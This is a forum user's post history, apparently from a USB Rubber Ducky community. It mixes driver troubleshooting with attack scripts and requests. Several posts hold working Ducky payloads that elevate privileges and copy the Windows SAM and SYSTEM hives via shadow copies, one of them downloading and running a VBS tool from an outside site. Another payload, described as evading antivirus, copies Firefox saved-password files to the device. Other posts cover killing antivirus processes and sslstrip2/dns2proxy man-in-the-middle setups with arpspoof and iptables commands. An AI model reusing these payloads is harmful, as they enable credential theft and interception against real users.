shamwow
-
Posts
52 -
Joined
-
Last visited
Posts posted by shamwow
-
-
Have you done any HID changes to it? Is this a recent purchase? Please explain more on events that lead up to this. The ducky should install automatically with default drivers without any issues.
no i havn't made any hid changes and no it's not a recent purchase. the ducky still works properly on another pc. what caused this problem was me unplugging the ducky while it was in the middle of automatically installing the driver.
-
i unplugged my ducky while it was automatically installing the drivers and from now on the ducky is not recognised. how do i make the ducky go back to automatically installing the drivers without failing?
the error i get is
"device driver software was not successfully installed."
-
This looks really good, good job. I did some superficial research on IE, and it appears that it stores the passwords in the registry. Could be a little more involved to extract such information, and hopefully the pass recovery tools would be able to accept the extracted data. You may have to read the values back into the registry on another computer in order to extract the passwords with a password tool. It should be possible to save as .reg files elsewhere. I am not a registry savant. I don't know though. I was looking at this site;
http://www.majorgeeks.com/content/page/how_to_manage_your_internet_explorer_saved_passwords.html
I think my Win 7 registry is set up a little bit different however, so you would need different payloads for XP, Win 7, and Win 8, or some sort of if statement within the script in order to preform the right operations.
in windows 7, i can get internet explorer 7, 8, 9 and 10 passwords.
-
is there a realease date for this os fingerprinting on the c_duck twin duck firmware?
-
i got it to work with the first one. i just had to replace the line with config-e466a.ps1 to config.ps1
-
is there a release date for os fingerprinting firmware for twin duck?
-
You need to know the process name (e.g. for Microsoft Security Essentials, process is "msseces.exe" in task manager) and if it requires administrative privileges to kill the task. You can then proceed to do this with the cmd command
'taskkill /id "msseces.exe" /f /t'
That will kill the given process. If you need admin privileges, you need to make the rubber ducky start cmd with administrator privileges. See examples at USBRubberDucky.com.NOTE: Some AV's are persistent. It may benefit you trying to open a given AV using the keyboard, then navigating to "Realtime Protection" turning that off, then once the script has executed, turn Realtime Protection back on again.
that didn't work on the current version of avg.
-
I don't know how to use the shadowcopy, however you could just initiate a copy /b in a command prompt to whatever directory you want.
E.g.
copy /b %userprofile%\NTUSER.DAT E:\NTUSER.DAT
that did not work because the file is in use by another program. anyways i figured it out using system shadow copy.
-
wireshark didn't tell me anything. thanks for nothing.
-
asus eeepc 900
-
The point is that, at least Firefox honors the HSTS header, meaning that now that it has accessed Facebook over https once, it will continue to do so for the next year or so immediately, without first going the HTTP route (sslstrip works by MITM-ing the machine on its initial connection, which always defaults to using HTTP. When the initial connection goes straight for HTTPS, it can't do anything).
can you try sslstrip2 and see what is causing the problem?
-
i used internet explorer and firefox. yes my machine did have access to the machine when i used sslstrip1 and worked.
-
I tried that but the webpage won't load. Maybe the problem is with sslstrip2 and not arpspoof.
Check the man page for arpspoof and try again.
It should probably be something like:
arpspoof -i wlan0 -t 192.168.0.2 192.168.0.1
-
i installed sslstrip2 and dns2proxy and python 2.7.3
and i did the ip forwarding with the recommend iptables as it shows in the manualecho 1 > /proc/sys/net/ipv4/ip_forward
iptables-t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9000
iptables-t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
after running python sslstrip.py -l 9000 and arp -i wlan0 target_ip gateway_ip and python dns2proxy.py
i went to my test machine and try hotmail.com; google.com; facebook.com ....
sslstrip2 is changing the url but the webpage wont load. can anyone tell me how to fix this?these are the links that i downloaded from.
https://github.com/singe/sslstrip2
https://github.com/singe/dns2proxy -
Sslstrip2 bypasses HSTS.
-
arpspoof -i wlan0 -r 192.168.0.2(target) -t 192.168.0.1(gateway)
-
ARP Spoof not working. It delivers a DoS instead. What am I doin' wrong?
In Kali Linux:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chainecho "1" > /proc/sys/net/ipv4/ip_forwarding
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
-
Hi,
I use the first one and it works (Using the twin duck). The only problem I had is that the keyboard layout had errors. This caused the rubber to not write the correct letters. What language are you using?
I am using english on a us keyboard. For the first script I did not see any sam file in the userprofile directory.
-
How can I copy NTUSER.DAT using system shadowcopy in a ducky script?
the file is in located in %userprofile%\NTUSER.DAT or (c:\users\<username here>\NTUSER.DAT)
-
I tried both of the following scripts but they aren't working. Can someone please fix these or provide another way to use Systemshadowcopy?
DELAY 1150 GUI r DELAY 1150 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1150 ALT y DELAY 1150 ENTER ALT SPACE DELAY 1150 STRING m DELAY 1150 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') ENTER STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } ENTER STRING $addSlash = $shadow.DeviceObject + '' ENTER STRING cmd /c mklink C:\shadowcopy $addSlash ENTER STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir ENTER STRING Remove-Item -recurse -force 'C:\shadowcopy' ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'null' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'null' } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1150 STRING C:\Windows\config-e466a.ps1 ENTER DELAY 1150 ALT F4 DELAY 1150 GUI r DELAY 1150 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1150 ALT y DELAY 1150 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1150 STRING m DELAY 1150 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1150 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER
ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 ENTER DELAY 400 STRING cd <DIRECTORY TO SAVE SAM AND SYSTEM TO> ENTER DELAY 200 STRING copy con download.vbs ENTER STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/"))) ENTER STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send() ENTER STRING If objXMLHTTP.Status = 200 Then ENTER STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open ENTER STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0 ENTER STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a ENTER STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing ENTER STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing ENTER CTRL z ENTER STRING cscript download.vbs http://tools.lanmaster53.com/vssown.vbs ENTER DELAY 800 STRING del download.vbs ENTER DELAY 800 STRING cscript vssown.vbs /start ENTER DELAY 800 STRING cscript vssown.vbs /create ENTER DELAY 800 STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM . ENTER DELAY 800 STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM . ENTER DELAY 800 STRING cscript vssown.vbs /stop ENTER DELAY 800 STRING del vssown.vbs ENTER STRING exit ENTER REM Make sure to change the DIRECTORY above.
-
Not sure if this is what you want but if you look at the killav.rb script in meterpeter it might give you an idea how to so this.
Maybe I could kill the processes if I am able to get System Admin privleges in a console but how do I become System Admin? I am only Admin and I don't have enough privledges to stop a service or kill an AV process.
-
I want it to kill my AV and then run Webbrowser Passview.exe
-
Can anyone tell me how I can use the USB Rubber Ducky to kill an Antivirus like AVG without getting Access Denied errors?
-
This is for stealing firefox passwords using just Batch because it is not detected by AV.
If someone could make Tutorial on how to make a Batch file to steal Internet Explorer passwords using only Batch or Powershell without triggering AV i would appreciate it.
For this you need the Twin Duck firmware.
You also need to label your ducky drive as the word "DUCKY".
DEFAULT_DELAY 75 DELAY 3000 REM get a cmd prompt this way because it's admin: CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 REM the admin part. CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat contents STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "ducky"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto while1 ENTER STRING :break ENTER REM REM FINALLY COPY THE FIREFOX STUFF: STRING mkdir %myd%\firefox\ ENTER STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\ ENTER STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\key3.db %myd%\firefox\ ENTER STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\cert8.db %myd%\firefox\ ENTER CONTROL z ENTER STRING DuckyWait.bat ENTER
This is not needed but is the .bat file that the Duck creates in the Temp directory.
:while1 for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d if Exist %myd% ( goto break ) timeout /t 30 goto while1 :break mkdir %myd%\firefox\ for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\ for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\key3.db %myd%\firefox\ for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\cert8.db %myd%\firefox\
To open and view the passwords just download Passwordfox.exe from the nirsoft site http://www.nirsoft.net/toolsdownload/passwordfox.zip
Manually select the profile folder that just got created in the Duck inside the new Firefox directory.
automatic driver install failed. is there a fix?
in Classic USB Rubber Ducky
Posted · Edited by shamwow
i clicked uninstall but there was no option to delete the drivers. i then rebooted. that didn't fix it.